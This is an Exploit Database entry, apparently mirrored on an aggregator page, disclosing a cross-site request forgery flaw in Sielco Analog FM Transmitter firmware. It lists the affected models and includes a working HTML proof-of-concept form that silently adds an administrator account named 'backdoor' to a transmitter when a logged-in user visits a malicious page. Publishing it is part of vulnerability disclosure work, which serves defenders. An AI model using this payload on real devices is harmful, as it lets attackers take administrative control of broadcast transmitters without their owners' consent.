Sielco Analog FM Transmitter 2.12 – Cross-Site Request Forgery

• Exploit Database
• 15 阅读

• 作者： LiquidWorm
  日期： 2023-04-14
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51364/

• <!--
  ## Exploit Title: Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
  ## Exploit Author: LiquidWorm
  
  Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery
  
  
  Vendor: Sielco S.r.l
  Product web page: https://www.sielco.org
  Affected version: 2.12 (EXC5000GX)
  2.12 (EXC120GX)
  2.11 (EXC300GX)
  2.10 (EXC1600GX)
  2.10 (EXC2000GX)
  2.08 (EXC1600GX)
  2.08 (EXC1000GX)
  2.07 (EXC3000GX)
  2.06 (EXC5000GX)
  1.7.7 (EXC30GT)
  1.7.4 (EXC300GT)
  1.7.4 (EXC100GT)
  1.7.4 (EXC5000GT)
  1.6.3 (EXC1000GT)
  1.5.4 (EXC120GT)
  
  Summary: Sielco designs and produces FM radio transmitters
  for professional broadcasting. The in-house laboratory develops
  standard and customised solutions to meet all needs. Whether
  digital or analogue, each product is studied to ensure reliability,
  resistance over time and a high standard of safety. Sielco
  transmitters are distributed throughout the world and serve
  many radios in Europe, South America, Africa, Oceania and China.
  
  Desc: The application interface allows users to perform certain
  actions via HTTP requests without performing any validity checks
  to verify the requests. This can be exploited to perform certain
  actions with administrative privileges if a logged-in user visits
  a malicious web site.
  
  Tested on: lwIP/2.1.1
   Web/3.0.3
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2023-5757
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php
  
  
  26.01.2023
  
  -->
  
  
  CSRF Add Admin:
  ---------------
  
  <html>
  <body>
  <form action="http://transmitter/protect/users.htm" method="POST">
  <input type="hidden" name="pwd0" value="" />
  <input type="hidden" name="pwd0bis" value="" />
  <input type="hidden" name="user1" value="" />
  <input type="hidden" name="pwd1" value="" />
  <input type="hidden" name="pwd1bis" value="" />
  <input type="hidden" name="auth1" value="" />
  <input type="hidden" name="user2" value="" />
  <input type="hidden" name="pwd2" value="" />
  <input type="hidden" name="pwd2bis" value="" />
  <input type="hidden" name="auth2" value="" />
  <input type="hidden" name="user3" value="backdoor" />
  <input type="hidden" name="pwd3" value="backdoor123" />
  <input type="hidden" name="pwd3bis" value="backdoor123" />
  <input type="hidden" name="auth3" value="2" />
  <input type="submit" value="Adminize!" />
  </form>
  </body>
  </html>